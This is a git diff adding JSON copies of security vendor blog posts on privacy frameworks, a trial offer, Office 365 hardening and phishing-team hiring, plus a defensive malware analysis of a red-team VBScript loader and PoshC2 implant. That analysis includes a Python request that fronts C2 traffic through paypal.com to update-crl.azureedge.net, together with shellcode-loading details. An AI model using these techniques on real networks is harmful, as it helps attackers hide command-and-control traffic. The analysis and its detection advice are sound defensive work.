privacy in the same way that the CSF brought security risk management to the masses. It demystifies a complex subject and allows smaller, less technical organizations to transact on privacy in a meaningful way. As a result, I believe we\u2019re going to see a wave of privacy risk management programs created throughout private industry. These programs will be tightly tied to cybersecurity activities but will have a focus on privacy and include a wider group of stakeholders in the development process. Organizations will be able to better protect an individual\u2019s privacy (w00t!) and continue to comply with various regulatory and industry requirements. The bottom line The Privacy Framework is still a work in progress \u2014 and as it stands isn\u2019t perfect. There was lots of constructive feedback shared at the Atlanta workshop and I\u2019m sure there will continue to be. (By the way, if you\u2019ve looked at the draft and want to share comments, you can email your feedback to privacyframework@nist.gov ). NIST will continue to refine the Privacy Framework and their goal is to have a final draft published by the end of 2019. I\u2019m optimistic that the final version of the Privacy Framework will be well harmonized with the CSF and allow organizations to rapidly adopt it as part of a broad and comprehensive privacy risk program. That will be the moment when privacy is re-imagined. 
The transformation of privacy from compliance to risk in a way that is attainable by organizations both big and small will be a big win not just for those orgs but also for all citizens. Cue the applause and roll the credits." +} \ No newline at end of file diff --git a/not-the-jedi-trials-but-our-free-trial-could-help-bring.json b/not-the-jedi-trials-but-our-free-trial-could-help-bring.json new file mode 100644 index 0000000000000000000000000000000000000000..f081e61f98df6efdbcd739f80467c12b20028a92 --- /dev/null +++ b/not-the-jedi-trials-but-our-free-trial-could-help-bring.json @@ -0,0 +1,6 @@ +{ + "title": "Not the Jedi trials, but our free trial could help bring ...", + "url": "https://expel.com/blog/not-the-jedi-trials-but-our-free-trial-could-help-bring-balance-to-the-force/", + "date": "May 4, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Not the Jedi trials, but our free trial could help bring balance to the Force Security operations \u00b7 1 MIN READ \u00b7 JAMES JURAN \u00b7 MAY 4, 2023 \u00b7 TAGS: Cloud security / MDR You didn\u2019t think we\u2019d let May the Fourth go by without a Star Wars -themed post, did you? In the Star Wars canon, Jedi Padawan needed to complete five trials to achieve Knighthood. Thankfully, we only have one trial, and it\u2019s free. Better, it doesn\u2019t involve intense physical pain, or worse, deep self-discovery. Instead, this trial is all about testing out Expel MDR (managed detection and response) for Cloud Infrastructure. How does it work? Sign up here , and you\u2019ll get 14 days of full access to our security operations platform, Expel Workbench \u2122, to check out our MDR for Cloud Infrastructure product. You connect your tech, conduct an incident simulation (we\u2019ll walk you through how), and we\u2019ll send you the findings of that alert. And if Expel actually does detect an Imperial battlecruiser (legitimate threat) in the Outer Rim (your cloud environment) during the trial period, our Jedi Council (security operations center) will have you covered, and will support your cloud environment, like it would for any customer, throughout the trial period. Once your trial is up, we\u2019ll freeze your account in carbonite and won\u2019t ingest any more data from your connected tech. Then we\u2019ll delete your account and data altogether after another 14 days. We don\u2019t store or keep any of your data after the 14-day frozen period expires. When it comes to the cloud, we know staying on top of multiple computing environments, databases, policies, and best practices can be complex, time consuming, and burdensome for your team. These concerns could be holding you back from moving to the cloud or scaling your cloud environment. Perhaps you don\u2019t have enough visibility, are having trouble dealing with cloud security alerts, or simply don\u2019t have consistent security coverage across your different cloud environments. Our goal with this free trial is to show you how we can help you up your cloud security game. So why not test out how Expel Workbench works in your environment? Setting it up is easier than\u2014constructing your own lightsaber, and might just help bring balance to your own little corner of the Force." 
+} \ No newline at end of file diff --git a/obfuscation-reflective-injection-and-domain-fronting-oh-my.json b/obfuscation-reflective-injection-and-domain-fronting-oh-my.json new file mode 100644 index 0000000000000000000000000000000000000000..b91dfb0fec5a90549785a4e56a0ae7df3f1cd7ac --- /dev/null +++ b/obfuscation-reflective-injection-and-domain-fronting-oh-my.json @@ -0,0 +1,6 @@ +{ + "title": "Obfuscation, reflective injection and domain fronting; oh my!", + "url": "https://expel.com/blog/obfuscation-reflective-injection-domain-fronting/", + "date": "May 26, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Obfuscation, reflective injection and domain fronting; oh my! Security operations \u00b7 9 MIN READ \u00b7 BRITTON MANAHAN \u00b7 MAY 26, 2020 \u00b7 TAGS: Get technical / Managed detection and response / Security Incident / SOC / Vulnerability We detect and respond to a lot of red team activity at Expel. Each engagement is a great opportunity for our SOC analysts to gain additional experience responding to an attacker (albeit a simulated one). Red team engagements help any security team stay ahead in a world with continuously evolving attacker tradecraft. When going head-to-head with a red team, we encounter a broad range of attacks. During a recent red team simulation we detected and responded to the execution of a suspicious VBscript file. Acquiring malicious files gives us the opportunity to extract deeper details that can be invaluable. In this post I\u2019ll walk you through our initial detection and then show you how we: Determined the logic implemented by the VBscript and its payload Extracted key details of the payload via base64dump.py and pecheck.py Decompiled the payload with JetBrains DotPeek Followed the chain of obfuscation to reach the red team PoshC2 implant Analyzed the red team implant for attacker IOCs Then I\u2019ll share the details of the capabilities the file contained as well as the insights we gathered coming out of this exercise. Spotting something suspicious: malware detection Malware analysis is \u201clike a box of chocolates,\u201d in that you never know what you\u2019re going to encounter as you inspect the details of malicious code. During this red team engagement with an Expel customer, the CrowdStrike EDR Platform alerted on the execution of a suspicious VBScript file. Expel Workbench Alert Details 1 Expel Workbench Alert Details 2 So, we dove in to take a deeper look. CrowdStrike Detection Details For this CrowdStrike alert, a VBScript file named settings.vbs was launched with the command-line version of the Windows Script Host, cscript.exe. CrowdStrike Overwatch observed that the cscript.exe process reflectively injected a library named SharpDLL.dll. Reflective injection inserts an executable library file into the address space of a process from memory instead of from on disk. This method doesn\u2019t rely on the LoadLibrary Windows API call, which only works with libraries files located on disk. The Expel Global Response team, which provides Expel with advanced IR capabilities during critical incidents, noticed two additional recorded activities for the cscript.exe process: Several .NET Framework Libraries (examples below) were loaded A DNS request for paypal.com (this will be explored more later on) CrowdStrike Detection Disk Operations CrowdStrike Detection DNS Request These recorded activities were extremely suspicious and signaled to us that it was time to conduct an investigation. That\u2019s when I began my analysis. 
Analyzing the file in three phases When I looked at the contents of the settings.vbs file, I noticed it began with following comment block: Beginning of settings.vbs None of the script functionality contained in the rest of the settings.vbs file relates to this comment block, which is part of its attempt to achieve a surface appearance of performing printer and network administrative activities. When looking at the first section of code executed by the script, note that the first steps taken determine which version of .NET the process executing the script should configure itself to load in. settings.vbs .NET Version Selection If present in a process when the .NET framework is loaded, the COMPLUS_Version environment variable will force a certain version of the .NET framework to be loaded. Based on the presence of a particular 4.0 version of the .NET framework, determined by checking for the existence of a Windows Registry key, the script will set this environment variable to either v4.0.30319 or v2.0.50727. The next action taken by the script is the initialization of two large base64 encoded strings, wpad_1 and wpad_2. settings.vbs Base64 Strings Both of these strings are passed through the ProxySettingConfiguration function, which decodes a provided base64 string. This function was the first strong evidence that the script was generated using the DotNetToJScript tool. DotNetToJScript is described as \u201ca tool to create a JScript file which loads a .NET v2 assembly from memory\u201d created by James Forshaw. This function is almost exactly the same as the Base64ToStream function in the vbs_template.txt file in the DotNetToJScript project source code. DotNetToJScript Base64 Decode Function settings.vbs Base64 Decode Function The decoded base64 strings are then deserialized using the deserialize_2 function. Serialization is \u201cthe process of converting an object into a stream of bytes to store the object or transmit it to memory, a database, or a file\u201d according to Microsoft C# Programming Documentation . Deserialize, the reverse of this process, returns the byte stream into its original form. settings.vbs Decode and Deserialize Strings After undergoing the decoding and deserialize process, the wpad_1 variable becomes the following: wpad_1 Contents As part of the .NET deserialize process, the script host process will attempt to load the 3.0.0.0 version of the Microsoft.PowerShell.Editor (The PowerShell ISE). This is likely some type of check on the current system the script is executing on, supported by the error check that happens immediately after in the code ( If Err.Number <> 0 ). Powershell ISE Check Failing on Fresh Windows 10 VM If this check passes, the code then moves onto its main finale of decoding and deserializing the larger base64 string in the wpad_2 variable. Seeing that there was an MZ header present in the second base64 string, and evidence of DotNetToJScript being used, I used a collection of Python scripts from Didier Stevens to continue my analysis in three phases. Phase 1: Settings.vbs \u2192 uqatarcu.dll: The base64dump.py and pecheck.py Python scripts by Didier Stevens make the process of locating a Windows portable executable (\u201cPE\u201d) file inside a base64 string much easier. After extracting the base64 string for the wpad_2 variable in settings.vbs into a text file, this script is used to expedite its analysis. 
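Conceptually, the carving step is simple. The short Python sketch below shows the same idea in miniature (decode the base64 while ignoring whitespace and double quotes, then keep everything from the first MZ signature onward); it's only an illustration of the technique, not a stand-in for base64dump.py and pecheck.py, and the carved.bin output name is just an example.

```python
import base64

def carve_pe_from_base64(b64_text):
    # Drop whitespace and double quotes before decoding, mirroring the
    # ignore options passed to base64dump.py in the command that follows.
    cleaned = "".join(ch for ch in b64_text if ch not in ' \t\r\n"')
    decoded = base64.b64decode(cleaned)
    # Keep everything from the first "MZ" signature (the start of a Windows PE file).
    offset = decoded.find(b"MZ")
    return decoded[offset:] if offset != -1 else None

with open("wpad_2.txt") as fh:
    payload = carve_pe_from_base64(fh.read())

if payload is not None:
    with open("carved.bin", "wb") as out:
        out.write(payload)
```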
Running the following command using the two scripts will: Decode the base64 string in wpad_2.txt while ignoring any whitespace or double quotes in the string Search for the first occurrence of the MZ Windows PE file signature Pass the decoded results starting at the search hit to pecheck.py to validate and parse the PE header Output the extracted information from the PE header base64dump.py [options] [file] Options used in blog post -w, --ignorewhitespace ignore whitespace -i IGNORE, --ignore=IGNORE characters to ignore -s SELECT, --select=SELECT select item nr for dumping (a for all) -c CUT, --cut=CUT cut data -d, --dump perform dump base64dump.py -w -I 22 -s 1 -c \"['MZ']:\" -d wpad_2.txt | pecheck.py The resulting verified PE file includes the following information: uqatarcu.dll PE File Information uqatarcu.dll Hashes and Overlay Details Then with the overlay offset known (extra bytes at the end of the parsed PE file), the following command will write out the first DLL, uqatarcu.dll, with the extra overlay removed. base64dump.py -w -I 22 -s 1 -c \"['MZ']:0xb9c00l\" -d wpad_2.txt > uqatarcu.dll Phase 2: uqatarcu.dll \u2192 Microsoft.dll and enclosed base64: The beautiful thing about C#.NET malware analysis is that, because C#.NET compiles to an intermediate language rather than to native machine code, binary files can be automatically decompiled back into their original source code. JetBrains DotPeek is a program that will automatically do this decompilation for you. Opening up uqatarcu.dll in JetBrains DotPeek shows that it imports the classic three-function combo for loading shellcode: VirtualAlloc, VirtualProtect and CreateThread. uqatarcu.dll Windows API imports Along with two more base64 strings, s1 and s2. uqatarcu.dll s1 and s2 The s1 string contains base64-encoded 32-bit shellcode and s2 contains 64-bit shellcode. The DLL examines the byte size of a pointer to determine the correct architecture to use, and will deploy the result to a dynamically allocated section of memory. After updating the allocated memory permissions to PAGE_EXECUTE_READWRITE, CreateThread is called with the beginning of this memory block (IntPtr num) as its starting address. uqatarcu.dll 32 or 64-bit uqatarcu.dll Deploy Shellcode Proceeding with the 64-bit version of the next stage for analysis, the contents of the s1 string, there are four hits this time for MZ in the decoded base64 string. However, only the final MZ hit is fully validated by pecheck.py. The cut parameter of base64dump.py makes it easy to specify after which search hit of MZ we want to start passing the decoded string to pecheck.py.
The number placed after the search term ending bracket specifies this in the commands below: base64dump.py -w -I 22 -s 1 -c \"['MZ']1:\" -d b64_uqatarcu_s1.txt | pecheck.py uqatarcu.dll s1 First MZ Match base64dump.py -w -I 22 -s 1 -c \"['MZ']2:\" -d b64_uqatarcu_s1.txt | pecheck.py uqatarcu.dll s1 Second MZ Match base64dump.py -w -I 22 -s 1 -c \"['MZ']3:\" -d b64_uqatarcu_s1.txt | pecheck.py uqatarcu.dll s1 Third MZ Match base64dump.py -w -I 22 -s 1 -c \"['MZ']4:\" -d b64_uqatarcu_s1.txt | pecheck.py uqatarcu.dll s1 Fourth MZ Match The cut data that was validated as a PE file by pecheck contains some interesting attributes for the file name and description: Microsoft.dll PE File Information This next DLL layer can then be extracted to disk with the following command: base64dump.py -w -I 22 -s 1 -c \"['MZ']4:\" -d b64_uqatarcu_s1.txt > Microsoft.dll This DLL is also a C#.NET binary, and loading it up in DotPeek reveals the following interesting code section: Microsoft.dll ShellCode Routine While this .NET source code makes it clear another base64 string is being decoded and executed, its location is not as straightforward. The binary does not contain any calls to the RunCS function, nor any base64 strings. Since a majority of the s1 string from uqatarcu.dll was bypassed as a result of the cut parameter \u201c[\u2018MZ\u2019]4:\u201d and the thread starting address was before the fourth MZ search hit, I decided to return to the s1 string to extract all available strings. base64dump.py -w -I 22 -s 1 -S b64_uqatarcu_s1.txt When scrolling through this output, the presence of an encapsulated base64 string visually stands out. uqatarcu.dll Encapsulated Base64 Phase 3: Encapsulated base64 \u2192 dropper_cs.exe: The base64 string found within the s1 string was successfully parsed by pecheck as a valid PE file. The PE header file information contains a very interesting filename. base64dump.py -w -I 22 -s 1 -c \"['MZ']:\" -d b64_from_b64_uqatarcu_s1.txt | pecheck.py dropper_cs PE File Information The binary can be further examined by generating a copy of it. base64dump.py -w -I 22 -s 1 -c \"['MZ']:\" -d b64_from_b64_uqatarcu_s1.txt > dropper_cs.exe \u201cdropper_cs.exe\u201d contains a number of notable strings, including the domain seen being resolved during its runtime (paypal.com) and strong references to the PoshC2 implant: Parse_Beacon_Time ImplantCore update-crl.azureedge.net https://www.paypal.com:443 https://www.paypal.com:443/lt/?c setbeacon This final payload of this layered piece of malware is again written in C#.NET. Loading it up in DotPeek provides a clear picture of its command and control functionality. dropper_cs Functions dropper_cs loadmodule dropper_cs download-file dropper_cs get-screenshotmulti dropper_cs listmodules Following the program logic reveals what is actually going on with the DNS resolution of paypal.com \u2013 domain fronting. Domain fronting leverages the way content delivery networks work in order to mask the true destination domain of an external network communication by operating at the application level. The DNS resolution and initial communication setup occur for the high-reputation domain, while the host header \u2013 the true destination \u2013 is then set to the attacker-controlled domain located on the same CDN. Domain Fronting Source: Domain Fronting in a nutshell by Rukavitsya The dropper_cs payload beacon was configured to appear to be communicating with paypal.com, which is set in the baseURL and address strings.
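To make the mechanic concrete before walking through the implant's own code, here is roughly what the equivalent request looks like in Python. This is an illustration of the technique using the domains observed above, not code recovered from the sample: everything the network sees up front (DNS, SNI, certificate) points at the reputable front domain, while the Host header names the real CDN-hosted destination.

```python
import requests

# DNS lookup, TLS SNI and certificate validation all reference the front domain...
resp = requests.get(
    "https://www.paypal.com/lt/",
    # ...while the Host header tells the CDN which (attacker-controlled) origin to route to.
    headers={"Host": "update-crl.azureedge.net"},
    timeout=10,
)
print(resp.status_code)
```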
After the initial DNS resolution, web requests for the beacon will actually end up being routed to update-crl.azureedge.net by setting this as the HTTP host header value with webClient.Headers.Add(\u201cHost\u201d, str). dropper_cs Domain Fronting Related Code 1 dropper_cs Domain Fronting Related Code 2 Based on CDN reporting tools, https://www.paypal.com:443 would resolve to the Akamai CDN. While azureedge.net is part of the Microsoft Azure infrastructure, Azure provides the option to select from a number of top CDNs, including Akamai. CDN Report for paypal.com Working through the layers of obfuscation contained in settings.vbs revealed its true nature. None of the PE files or shellcode encapsulated in the .vbs file ever hit the hard drive; instead, they are reflectively loaded into the script host process memory. The end result of our analysis gives us the source of the beacon payload and the real C2 domain. Settings.vbs -> uqatarcu.dll (32/64 bit branch) -> SharpRunner.dll (other ShellCode in Memory Space) -> dropper_cs.exe Insights from this malware examination As I mentioned at the beginning of this post \u2013 it\u2019s important to come out of red team engagements having learned something new that can help our customers in real life. Here\u2019s what I learned after exercising my detective muscles and untangling malware code in this simulation: Malware analysis takes persistence to peel back the layers Reaching the core of a malicious payload can provide invaluable insight With the right CDN, domain fronting is still a viable option for malicious actors We\u2019re working on another blog post that explores a suspicious login case study, so stay tuned for our upcoming content. Until then, check out our other blog posts for more lessons learned from alert investigations. A note about domain fronting Domain fronting depends on having a domain on the same CDN as the domain it\u2019s masquerading as, and on the CDN still permitting the technique. While Google and Amazon have shut down the ability to perform domain fronting on their CDN services, this technique still works on Azure and other platforms. Domain fronting is not only leveraged by hackers to help blend in within a company network, but also used by non-malicious internet users to bypass Internet censorship. There is an argument that keeping it available is essential for Internet Freedom ( Domain Fronting Is Critical to the Open Web ). Time will tell if domain fronting remains an option for those with malicious and non-malicious intentions, but companies worried about it being used by malicious actors to help hide in their networks aren\u2019t powerless to detect it. Domain fronting can be detected by comparing the host field of the HTTP header with the HTTPS SNI field of the web request. This requires SSL inspection \u2013 the ability to view the encrypted HTTP data \u2013 or a next-gen firewall product that directly provides this detection."
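Once you have logs that record both fields, the comparison itself is only a few lines. The sketch below is a rough illustration of that check; the column names (tls_sni, http_host, src_ip) and the CSV input are hypothetical stand-ins for whatever your proxy or NGFW actually emits, and legitimate mismatches (shared CDN hostnames, virtual hosting) mean hits are leads to review, not verdicts.

```python
import csv

def find_sni_host_mismatches(log_path):
    """Flag web sessions where the TLS SNI and the HTTP Host header disagree."""
    suspects = []
    with open(log_path, newline="") as fh:
        for row in csv.DictReader(fh):
            sni = (row.get("tls_sni") or "").strip().lower()
            host = (row.get("http_host") or "").strip().lower()
            if sni and host and sni != host:
                suspects.append((row.get("src_ip"), sni, host))
    return suspects

for src, sni, host in find_sni_host_mismatches("web_proxy_logs.csv"):
    print(f"{src}: SNI {sni} vs Host {host} (possible domain fronting)")
```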
+} \ No newline at end of file diff --git a/office-365-security-best-practices-five-things-to-do-right.json b/office-365-security-best-practices-five-things-to-do-right.json new file mode 100644 index 0000000000000000000000000000000000000000..fc71f356dce8333a0fe660cc891844bd8c2e7ac3 --- /dev/null +++ b/office-365-security-best-practices-five-things-to-do-right.json @@ -0,0 +1,6 @@ +{ + "title": "Office 365 security best practices: five things to do right ...", + "url": "https://expel.com/blog/office-365-five-things-to-keep-attackers-out/", + "date": "Jan 15, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Office 365 security best practices: five things to do right now to keep attackers out Security operations \u00b7 3 MIN READ \u00b7 DAN WHALEN \u00b7 JAN 15, 2019 \u00b7 TAGS: Cloud security / How to / Selecting tech Figuring out what you should do to protect your SaaS infrastructure like Office 365 \u2014 especially if you\u2019re newer to cloud \u2014 can feel overwhelming. After all, your users over in sales, marketing or R&D probably aren\u2019t going to think twice about how strong their passwords are, or notice the cleverly disguised phishing scam that just landed in their inboxes. We get it. And you\u2019re not alone if you\u2019re kinda freaking out: According to the PhishLabs 2018 Phishing Trends and Intelligence Report , attacks targeting SaaS applications exploded last year, growing by more than 237 percent. SaaS-based applications: a cloudier view of your data Things like email, word processing and document sharing tools are ubiquitous. This makes them prime targets for attackers. Long gone are the days when IT ran their own email servers. Today, SaaS-based applications like Microsoft Office 365 offer lots of convenience and cost savings \u2014 but since they operate in the cloud , it also means your former front row seats to your data and infrastructure now come with a slightly obstructed view. While cloud providers like Amazon Web Services, Microsoft Azure and Google are responsible for securing their infrastructure, the bottom line is that your organization is still responsible for protecting your company\u2019s data \u2013 whether you\u2019ve only got one app in the cloud or you\u2019ve moved all of your apps and data up there. (Psst: If your cloud security strategy needs a tune-up, you won\u2019t want to miss this post .) No matter where you are in your cloud journey, if you run Office 365 here are five important things you can do right away to keep attackers (and wiley insider threats) at bay. What do I need to do to keep Office 365 secure? If you\u2019re running Microsoft Office 365, there are five Office 365 security best practices you\u2019ll want to check out right now to keep your org and your data safe: Enable audit logging . This is one of the most impactful things you can do when it comes to securing Office 365. Why? Office 365 audit logs record all activities across Office 365 apps. When an incident occurs, this makes it a lot easier to investigate because you\u2019ve got access to all the actions users took in Office 365, ranging from viewing and downloading documents to resetting passwords. Here\u2019s a full list of the actions that Office 365 audit logs record, and instructions for turning on audit logging . Use multi-factor authentication everywhere. Multi-factor authentication is a lot like building a fence around the perimeter of your house (or data, in this case) to deter bad actors. 
It shrinks your risk of falling victim to the most common attacks like simple phishing and password spraying. Phishing is still one of the top initial attack methods of choice . For instance, take a look at this example of a crafty phishing campaign that hid malicious URLs in SharePoint files. Implement controls to stop the most common things attackers and users do. Look for security controls that address issues like phishing prevention, malware scanning, user behavior analytics and DLP scanning. Depending on your organization, this could mean implementing native Office 365 security tools , or exploring third-party options. Tighten up your Office 365 policy configurations. Microsoft offers good advice on ways to better secure your data in Office 365. Based on the Office 365-related incidents the Expel team has investigated and resolved for our customers, we recommend that, at a minimum, you review your organization\u2019s conditional access policies, restrict or disable public SharePoint and OneDrive links and disable mailbox forwarding. Plan ahead for account compromises \u2014 they\u2019re inevitable. Not to be all \u201cdoom and gloom\u201d over here, but as anyone in security knows, it\u2019s always wise to prepare for the worst. Know that when an incident occurs, investigations are probably different than the good ol\u2019 days when you had your email server tucked away safely in your server room. For starters, there aren\u2019t any endpoints or network devices to review. Also absent are files, processes and network traffic \u2014 all of which helped us determine the scope and impact of an intrusion in the past. Instead, SaaS incident investigations rely heavily on audit logs (see best practice #1) that are user-centric because they can help us determine what\u2019s normal or abnormal for a particular user\u2019s account. What location does the user normally authenticate from, and what device does he or she normally use? What actions does he or she take after logging into the account? To answer these questions, you\u2019ll need to be familiar with Office 365 audit logs. Last but not least, keep our handy cheat sheet for managing your next security incident nearby (and give a copy to every team member!). Still have questions? Want to learn more about Office 365 security in the cloud? Get in touch \u2014 we\u2019d love to help." +} \ No newline at end of file diff --git a/our-approach-to-building-expel-s-phishing-team.json b/our-approach-to-building-expel-s-phishing-team.json new file mode 100644 index 0000000000000000000000000000000000000000..e5debf66df93aeb7c35aa2e85c2a8855ae2046ac --- /dev/null +++ b/our-approach-to-building-expel-s-phishing-team.json @@ -0,0 +1,6 @@ +{ + "title": "Our approach to building Expel's Phishing team", + "url": "https://expel.com/blog/our-approach-to-phishing-team/", + "date": "Nov 8, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG A new way to recruit: Our approach to building Expel\u2019s Phishing team Security operations \u00b7 8 MIN READ \u00b7 BEN BRIGIDA, RAY PUGH, DESHAWN LUU AND HIRANYA MIR \u00b7 NOV 8, 2021 \u00b7 TAGS: Careers / Phishing A lot of companies are experiencing a brain drain in what\u2019s being called the Great Resignation. It\u2019s a pain that security teams know all too well. You hire great people who have the skills you need, they get familiar with your environment, and then\u2026they\u2019ve already moved on to their next job. You\u2019re happy for them. But now you\u2019re back to the beginning. Is there a solution? 
We\u2019ve written blog posts about how optimizing the human moment helps us not only create greater efficiencies in our operations, but also helps us prevent analyst burnout while giving them meaningful work. Optimizing for the human moment here at Expel means letting tech handle the work that can be automated \u2014 think decision support, enrichment and automation of repetitive tasks that increase cognitive load (i.e. the things that cause analyst burnout) \u2014 so our crew has the time and space to shine in the moments when a human eye is required. Fun fact: the initial beta of Expel\u2019s phishing service was built in a Jupyter notebook written by one of our security operations center (SOC) analysts. He\u2019s now one of our detection and response (D&R) engineers. Creating space for people to do what they love is at the core of why we do what we do. We do it for our customers and it\u2019s important to us that we also do it for our Expletives. So we asked ourselves: how do we build a service and training program that\u2019s accessible to folks early on in their security career journey? We discovered that part of the answer is in widening the pool for recruitment by focusing on traits, not skills. Allow us to explain. The Expel Phishing team is one of our newest teams, and recruiting for that team created an opportunity for us to experiment with this approach. So we set out to hire for the traits that are important for these roles (curiosity, candor, passion for learning, desire to help others, drive and attention to detail), knowing we could then teach our new team members the skills they need to be successful. In this blog post, we\u2019ll share how we\u2019re using the Expel Phishing team and its simple, narrow focus, to achieve two goals: Protect managed detection and response (MDR) service continuity Increase diversity in cybersecurity At the end of this post, you\u2019ll also hear from some of our newest Expel Phishing team recruits. They\u2019ll share their stories and what it\u2019s like to be a new member of the team. The Expel Phishing team Phishing is still the top threat facing most orgs. In fact, business email compromise (BEC) attacks made up 61 percent of the critical incidents Expel\u2019s security operations center (SOC) responded to in September. Knowing that phishing isn\u2019t only going to remain a top threat but that tactics will also continue to evolve, the Expel Phishing team was created in partnership with our customers. They had a need and we knew how to help. The initial team was a temporary experiment. After finding success during the research and development phase, we decided to pull in some of our other customers to beta test the service and see if we could run it on a larger scale. The beta test was a success and we introduced Expel\u2019s managed phishing service. The Expel Phishing team functions as a cost-effective bench for our managed detection and response (MDR) service. We expect a lot of our MDR analysts \u2014 providing world-class service against every bad actor on the internet on a staggering number of technologies and attack surface areas, in a transparent platform, while also communicating the findings directly to our customers in Slack. No pressure, right? We\u2019ve got their backs, just like we\u2019ve got our customers\u2019 backs. Protecting MDR service continuity Finding people who can provide that kind of MDR service on even one of our service offerings is difficult at an entry-level position. 
This means we have to spend time teaching our analysts what attackers do on roughly everything and how to use the Expel Workbench\u2122 to update customers about our work in real-time. It\u2019s a lot to learn, and it takes a while. On the other hand, because phishing has a much narrower scope, phishing analysts can focus on learning to find attackers in one threat vector (emails) and how to use the Expel Workbench to do so. Then they can communicate their findings to our customers. Through this learning process, they\u2019re also interwoven into the MDR service (think our SOC\u2019s always-open Zoom room, chats and meetings) so they see the MDR operational tempo and texture. As a result, phishing analysts focus on emails but also get exposure to more attack surfaces over time. So when there is an opening on the MDR team, phishing analysts can slot in and rapidly provide value because they\u2019ve effectively been in MDR training for their whole time on the phishing team. Because of these dual levels of exposure, we can draw out the learning timeline and have a lower technical threshold for recruiting phishing analysts because we can teach them how to do security at the MDR level while they initially provide value to phishing customers. As a result, we\u2019ve found that analysts who transition to the MDR service from the phishing team have a significantly greater familiarity with our customers, internal processes and the investigative methodology/analyst mindset we use \u2014 which they can put to use right away. Our phishing to MDR pipeline enables analysts to join our SOC even if they\u2019re new to the industry, gives them space to build additional skills and experience and our customers benefit from having them stay here as they continue to grow and have a clear path for career progression. Increasing diversity in cybersecurity This brings us to our second goal: increasing diversity in security. There are plenty of high-performing people looking to get into security. And a complex service offering has traditionally required either hiring people who have extensive experience in the field so they can perform the job now, or a lengthy onboarding period where a less experienced analyst is learning and having to produce under high expectations and pressure. Not only does this make it difficult to hire \u2014 it\u2018s one of the many driving forces behind the lack of diversity in our field. The barriers to entry for underrepresented groups in tech (and other industries) result in a lot of terrible things. And one of those is limited opportunities for people from underrepresented backgrounds to gain the years of experience that so many security jobs require. Bringing on someone who doesn\u2019t have the skills or knowledge to perform at the expected level impacts margins and puts the person in a bad spot for their mental well-being and likelihood of success. So we designed our hiring process with simple enough technical requirements and we focus almost exclusively on the traits of the people we\u2019re hiring. These are important traits that\u2019ll help them be successful in the role while we teach them the hard skills they\u2019ll need to do the job. This hiring strategy dramatically increases the pool of potential candidates who have the enthusiasm and willingness to learn but maybe haven\u2019t yet been given the opportunity they need to learn some hard skills. It lets us hire folks much earlier in their security journey and set them up for success. 
Entering a new industry, and particularly security work, can be intimidating. So we start by teaching our new phishing analysts technical fundamentals for a niche area of expertise. This foundation allows them to grow and expand as they\u2019re ready, and we tailor our approach to each individual based on their skills, strengths, growth areas, goals and personal life. Maintaining balance for each of our analysts is key. We get to provide them with a potentially life-changing opportunity to enter the field and learn the skills they\u2019ll need to succeed while they get to help our customers stay ahead of emerging threats. In a rapidly changing global landscape, we need to make sure we\u2019re prepared to quickly adapt. This doesn\u2019t just mean building new capabilities and building automations that continuously increase efficiency. It means planning for personal leave for both planned and unforeseen circumstances so our team can take the time they need to recharge while making sure that we never skip a beat. We also need to account for promotions, job changes and training time for new analysts. And we make sure that if an analyst leaves the team for one reason or another, we\u2019re still resourced to continue providing the same high-quality service our customers expect. This is thanks to our streamlined initial training that gets new hires combat-ready in just a few weeks. We also prioritize getting to know and staying in touch with folks who we believe will be a good fit for the team, even if we don\u2019t immediately have a job opening for them. That way, when a position becomes available, we can reach out and find someone ready to enthusiastically step into the role. Widening the talent pool Our approach to hiring and training our phishing team has already paid dividends. We\u2019ve promoted multiple analysts from our Expel Phishing team into our MDR service. And they\u2019ve stepped in and provided Expel MDR-level service in just two weeks. In May 2021, our phishing service became part of our 24\u00d77 operations. Since going 24\u00d77, we\u2019ve seen a 500 percent increase in email submissions. And our crew transitioned seamlessly. With equity at the forefront of our minds, we\u2019re also excited about the incredibly talented people who\u2019ve joined our team. So far, 31 percent of our phishing team hires are women and 44 percent are people of color. And by working in close collaboration with our Equity, Inclusion and Diversity (EID) leads, we plan to continue widening our talent pool to bring on the best of the best from different backgrounds and experiences. We know a focus on EID initiatives will help us create the strongest team. Meet some of the crew So, how\u2019s it going for our new Expletives on Expel\u2019s Phishing team? Here\u2019s what they\u2019re saying: \u201cI was so burnt out on applying for positions and going through lengthy interview processes that I was having major anxiety. Expel\u2019s recruiter, Neiko, picked up on that immediately and went into \u2018how can I help\u2019 mode. This was my first major indicator that maybe Expel wasn\u2019t like any other company. We talked, rescheduled and thankfully two weeks later I was presented with an offer. I never could have imagined the trajectory my career has taken in such a short amount of time, but that\u2019s the thing with Expel \u2014 anything is possible!! From day one, my team lead was proactive in asking about and helping me develop some career goals. 
I definitely credit our weekly 1:1\u2019s as well as my growing responsibilities as a huge catalyst for me learning new things and strengthening my skill set. Coupled with the fact that you are surrounded by like-minded individuals who love what they do and are passionate about cybersecurity, you have a recipe for success. Both my team lead and senior analysts helped me thrive. From a junior phishing analyst to associate MDR analyst, cheers to an environment that fosters real growth!\u201d Stacey Lokey , associate MDR analyst \u201cBreaking into the cybersecurity industry is not an easy task. Be prepared to edit your resume, prepare for interviews and just keep pushing ahead after hearing \u2018no.\u2019 Even when one does break into the industry, landing in an environment that is positive and actively promotes one\u2019s growth is like finding a needle in a haystack. Then there\u2019s Expel, a company that not only looks for entry-level analysts but also provides a pipeline to become a career-level analyst. My experience with Expel was the dictionary definition of seamless. After speaking with the hiring managers and hearing many of their journeys to the security field, I knew I wanted to join the team. At Expel, it wasn\u2019t only about the technical expertise of the industry but about who you are as a person and relatable skills that successful analysts tend to possess.\u201d Dom Bryant , SOC security specialist \u201cMy experience as a junior SOC analyst on the Phishing team greatly prepared me for a role on the MDR team. Working on malicious email submissions and BEC activity provided a great foundation for \u201cworking on the bad\u201d (one of my favorite parts of the job). Additionally, although I was on the phishing team, our SOC is one team as a whole. It was because of this that I was able to gain exposure to MDR alerts, processes, incidents and even get some hands-on experience with the help of other team members. All of this experience led to me feeling much more calm and confident when transitioning to the MDR team.\u201d Tucker Moran , associate detection & response analyst \u201cStarting out as a member of the phishing team allowed me to focus on a single alert type while getting familiar with all of the technology that Expel has access to, as well as the various customers we support. This experience allowed me to focus on developing my analyst skill set, while figuring out my personal process for triaging alerts. Given a few months in this role, I became comfortable with taking the next step over to MDR where we handle a much larger variety of alert types. While it can certainly be done, it was a much less overwhelming transition being comfortable with the different technology and processes before 